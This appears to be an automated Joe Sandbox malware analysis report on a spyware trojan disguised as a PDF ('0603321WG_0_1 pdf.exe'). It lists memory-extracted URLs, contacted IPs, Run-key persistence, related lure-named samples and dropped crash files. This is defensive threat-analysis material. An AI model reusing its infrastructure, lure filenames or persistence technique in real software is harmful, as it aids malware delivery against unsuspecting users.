http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://mail.orienttech.com.qa | 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://coroloboxorozor.com | 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
https://api.ipify.org%$ | 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://r3.i.lencr.org/0 | 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://r3.o.lencr.org0 | 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://ajyrmk.com | NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0603321WG_0_1 pdf.exe, 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.root-x1.letsencrypt.org0 | 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                                      Contacted IPs


                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.71.230 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.172.17 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356527
Start date: 23.02.2021
Start time: 09:31:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 53s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 0603321WG_0_1 pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@27/14@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 4.7% (good quality ratio 0%)
• Quality average: 0%
• Quality standard deviation: 0%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.107.3.254, 13.107.246.254, 52.255.188.83, 13.64.90.137, 92.122.145.220, 104.43.139.144, 104.43.193.48, 51.11.168.160, 93.184.221.240, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/356527/sample/0603321WG_0_1 pdf.exe

                                                      Simulations

                                                      Behavior and APIs

Time | Type | Description
09:32:19 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
09:32:19 | API Interceptor | 649x Sleep call for process: 0603321WG_0_1 pdf.exe modified
09:32:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
09:32:39 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
09:33:38 | API Interceptor | 151x Sleep call for process: NewApp.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

Match | Associated Sample Name / URL | Detection | Context

104.21.71.230
• VIws8bzjD5.exe | malicious | coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
• quotation_PR # 00459182..exe | malicious | coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
• PURCHASE ORDER CONFIRMATION.exe | malicious | coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
• PAYRECEIPT.exe | malicious | coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
• New Order.exe | malicious | coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
• TT.exe | malicious | coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
• Payment_pdf.exe | malicious | coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
• TT.exe | malicious | coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
• purchase order 1.exe | malicious | coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
• telex transfer.exe | malicious | coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
• ORDER PURCHASE ITEMS.exe | malicious | coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
• Doc_3975465846584657465846486435454,pdf.exe | malicious | coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
• CV-JOB REQUEST______pdf.exe | malicious | coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
• CN-Invoice-XXXXX9808-19011143287989.exe | malicious | coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
• Download_quotation_PR #371073.exe | malicious | coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
• CN-Invoice-XXXXX9808-19011143287990.exe | malicious | coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
• PurchaseOrdersCSTtyres004786587.exe | malicious | coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

                                                      Domains

                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                      coroloboxorozor.com | RG6ws8jWUJ.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      VIws8bzjD5.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      PURCHASE ITEMS.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      CN-Invoice-XXXXX9808-19011143287992.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      quotation_PR # 00459182..exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      PURCHASE ORDER CONFIRMATION.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      XP 6.xlsx | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      PAYRECEIPT.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      New Order.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      PO#87498746510.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      TT.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      Payment_pdf.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      TT.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      purchase order 1.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      telex transfer.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      Invoices.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      ORDER PURCHASE ITEMS.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230
                                                      Authorization Letter for Hiretech.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      Doc_3975465846584657465846486435454,pdf.exe | Get hash | malicious | Browse
                                                      • 104.21.71.230

                                                      ASN

                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                      CLOUDFLARENETUS | 8WjU4jrBIr.exe | Get hash | malicious | Browse
                                                      • 104.23.98.190
                                                      RG6ws8jWUJ.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      8TD8GfTtaW.exe | Get hash | malicious | Browse
                                                      • 104.23.99.190
                                                      lpdKSOB78u.exe | Get hash | malicious | Browse
                                                      • 104.21.76.239
                                                      VIws8bzjD5.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      PURCHASE ITEMS.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      Shipping Document PL&BL Draft.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      CN-Invoice-XXXXX9808-19011143287992.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      Halkbank_Ekstre_20210223_082357_541079.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      quotation_PR # 00459182..exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      FOB offer_1164087223_I0133P2100363812.PDF.exe | Get hash | malicious | Browse
                                                      • 104.21.19.200
                                                      PURCHASE ORDER CONFIRMATION.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      22 FEB -PROCESSING.xlsx | Get hash | malicious | Browse
                                                      • 172.67.160.246
                                                      Yao Han Industries 61007-51333893QR001U,pdf.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe | Get hash | malicious | Browse
                                                      • 172.67.172.17
                                                      ORDER LIST.xlsx | Get hash | malicious | Browse
                                                      • 23.227.38.74
                                                      (appproved)WJO-TT180,pdf.exe | Get hash | malicious | Browse
                                                      • 104.21.19.200
                                                      purchase order.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      9073782912,pdf.exe | Get hash | malicious | Browse
                                                      • 172.67.188.154
                                                      SOS URGENT RFQ #2345.exe | Get hash | malicious | Browse
                                                      • 104.21.19.200

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_0603321WG_0_1 pd_98bd58f48ef509af446eb5671f3c86527ad3da4_f928aaae_197efbc9\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6794
                                                      Entropy (8bit):3.740196881131836
                                                      Encrypted:false
                                                      SSDEEP:96:IY6H9KTGvxJMlJuLWMlHHxpLUpXI75c/NZAXGng5FMTPSkvPkpXmTAPfnVXT5Urk:dC9KavxCzCm8T/u7sWS274It8VBR
                                                      MD5:6E9BF1A3AE42C64A99D0167BA5034FC1
                                                      SHA1:FBBACB8A6F94CE135B75A3D4C9472AEE1C613352
                                                      SHA-256:D3A161BB17A20EB1EBE6A23B916127C0EBD61C32770165A92F65AC2C003BD7A0
                                                      SHA-512:F1FC2F787132FEE7599FA2D609C7CD1330A0B26F3FA4E888FE1F0F045C4DCE6ED9326B68ED23C56EC10B409F87218AC24E34F18F53B64F6D3DD354626B60A60D
                                                      Malicious:false
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.2.8.9.1.6.3.7.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.7.3.7.9.1.6.3.5.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.c.0.f.6.1.8.-.9.4.7.7.-.4.7.5.1.-.a.b.b.6.-.8.6.8.4.3.9.d.d.2.e.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.3.f.9.b.3.2.-.b.8.0.6.-.4.1.e.9.-.a.4.0.7.-.d.4.3.4.7.d.c.8.f.9.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.6.0.3.3.2.1.W.G._.0._.1. .p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.b.-.9.c.c.c.-.b.e.5.6.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.b.3.d.e.c.4.6.0.a.c.c.7.9.e.f.5.a.4.a.4.d.3.e.1.5.4.6.2.9.e.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.0.6.0.3.3.2.1.W.G._.0._.1. .p.d.
                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_55e97c2a76b36abd95c012613cbdc1e87e1be27_ecfa8783_1264366c\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15332
                                                      Entropy (8bit):3.7586859891010573
                                                      Encrypted:false
                                                      SSDEEP:192:8PLh/ht8CmPaKsUAeZiN/u7ssS274ItqyD:C/hGalmW/u7ssX4ItHD
                                                      MD5:479AF2C9DEE3833076BB790A4C3B559A
                                                      SHA1:FE3A2A8630CDE9246E679598815937EC827E330B
                                                      SHA-256:FECA214AD05C7AE82A06B94AF153C5E1F540E4A151E822C069AD64AA8C2FF81F
                                                      SHA-512:8E86BFE677B83B8D1A5625A49F6B4AD4879C45688C3214C419857F9F6F8E4E7CBC6818078227CDFCE2D33B52AFBAE074B6CE7606A70221A16C1346A701A596B9
                                                      Malicious:false
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.9.2.9.6.3.0.4.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.8.1.8.6.1.9.2.1.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.4.5.4.c.2.e.-.3.a.3.8.-.4.0.8.d.-.b.e.a.0.-.7.2.5.8.7.3.7.6.b.2.e.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.2.2.d.0.c.1.-.f.1.7.a.-.4.d.b.1.-.b.0.9.5.-.0.0.2.5.f.9.a.a.f.5.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.6.c.-.0.0.0.1.-.0.0.1.b.-.d.0.2.7.-.e.5.7.1.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.9.a.1.d.e.b.e.b.b.c.5.6.6.d.1.8.6.1.c.c.b.2.8.b.f.4.9.e.d.b.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_55e97c2a76b36abd95c012613cbdc1e87e1be27_ecfa8783_12fc5abd\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15932
                                                      Entropy (8bit):3.7632663178108876
                                                      Encrypted:false
                                                      SSDEEP:192:jEvV/7t8CmHBUZMXCaPceny+f//u7ssS274Itqyv:IN/7ABUZMXCaZ1X/u7ssX4ItHv
                                                      MD5:496BFFA99BF267B2431EC0E72BDEBBE3
                                                      SHA1:6A5B0AA512A7832BB8A21786FE8F61E29FE9E128
                                                      SHA-256:20BA1F70F2C853372F3EFC972DCB3148F75F446797D67559E61E20A1656B2053
                                                      SHA-512:E2A6A35D5AAD51482B24EE2BB67724E6A4FA3A5D0E9DFEFBFF1297E6965C87BE807AF8313C0391ADBA6BF73967BEC03C5E2F070CC20EAEB36E70DC177BCF0DD2
                                                      Malicious:false
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.9.2.2.2.8.6.7.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.8.1.6.6.8.1.7.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.2.d.c.9.b.b.-.b.0.4.c.-.4.1.c.f.-.a.b.8.1.-.b.8.b.8.0.0.e.5.9.c.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.d.6.d.b.4.0.-.6.7.4.f.-.4.0.a.8.-.b.2.0.a.-.7.e.f.3.0.3.1.c.e.3.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.b.-.0.b.a.3.-.0.6.7.7.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.9.a.1.d.e.b.e.b.b.c.5.6.6.d.1.8.6.1.c.c.b.2.8.b.f.4.9.e.d.b.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8DD.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:33:19 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):194382
                                                      Entropy (8bit):4.4399707215637365
                                                      Encrypted:false
                                                      SSDEEP:3072:f3lYJ0sjd+pGchmAezow9gIOgF5xD0jhx+LUCgU5SYuBvZ:N00dpGX79RpDxDw8TjVOx
                                                      MD5:417F92F2BF27F0072C89729DCCDB4384
                                                      SHA1:117AB394D5281C39BEA1D0DDB9D1AE37A283BFB3
                                                      SHA-256:E99DA130C6DB298931886AF45AFF58F7F2D04771A0D893DED047C07EBBD6D0B6
                                                      SHA-512:0DB8FEE3296F28DB3F2B56F15BC198383B69BC30158772B7EF30872BE0C8EAD74F909E3FF1567CF45D4370F3C9C3BDB25FFA80AB3F00B616DEF705BDC8FC7F45
                                                      Malicious:false
                                                      Preview: MDMP....... ........4`...................U...........B......D)......GenuineIntelW...........T.............4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBBC.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:33:20 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):194782
                                                      Entropy (8bit):4.482260199726339
                                                      Encrypted:false
                                                      SSDEEP:3072:M6t+TfW0cVjd+pfA168OC/joF9gIOgF53e04DUCgU9ht:Tn0cqpCZo9RpD3eNDTjh
                                                      MD5:24DAD6D5E162C57A23EB35FCE308D105
                                                      SHA1:A88AC3AFA2E6B16174EB7BC97BCB26E08008FF43
                                                      SHA-256:77DDF2E2E353E18C3385FEC5341886750769F215B63A188E6A41407BBF1D37D8
                                                      SHA-512:46250D3872B9B4587AE30708F507E1D58377954C25D22FB891728BDB35902C5D004E0E1F7A963EFF38B120346A85C16CD21F174123BE8141FCD19648E60E149E
                                                      Malicious:false
                                                      Preview: MDMP....... ........4`...................U...........B.......)......GenuineIntelW...........T.......l.....4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD18D.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:32:13 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):13720
                                                      Entropy (8bit):3.070412399223422
                                                      Encrypted:false
                                                      SSDEEP:96:5rQ8+GYp9TLk8lilfwJUZJhUUd1CsBayOkMleik3Vi0+FToSowMlkTKM9vuRmby:W8i0fIUEE1CsBayOkvZDxlcqYy
                                                      MD5:CF2A96D11AC4F1BDE401B42F863E15B6
                                                      SHA1:4C9B19905C24D028694ECE424103A38DCA35AB1C
                                                      SHA-256:B0566A478D0DAF555C71CE14103D440EA85467FD1305AEB62002EA20408437A8
                                                      SHA-512:BA8A58F18EF9A1CDBBB907C1BD7C6267ACE8063F6F4EAB4A5A174880CC5B2D33B400773A97C762656DA393D8ADFD39048AD4C062AC1DA5E09ABF037217BB1DEE
                                                      Malicious:false
                                                      Preview: MDMP....... .........4`...................U...........B.......)......GenuineIntelW...........T.......\...y.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3ED.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):7984
                                                      Entropy (8bit):3.6924550921072723
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNilLR6Db6Yr6SU3NgmfZjDM0Sz9+pr189bUKsfAcm:RrlsNi/6f6Y2SU3NgmfbSzLUpfK
                                                      MD5:70143ACCD961F32D9CF079B4A90385B2
                                                      SHA1:5C48E93C265A0A5157A5097381CF79E40FA34470
                                                      SHA-256:98C6213AAA43425271A1CBFEBB0FF31CA8F9EBC68F44436C0E468A165C52AF77
                                                      SHA-512:EE70CAE77848CB86182F9F4BFE5052C3EA23585408AE91183818950F69F92AB548CC0A8F75A69A822C2F38F51C840A6F5886BE4CE3BA7C4032244A5E5E52EDDB
                                                      Malicious:false
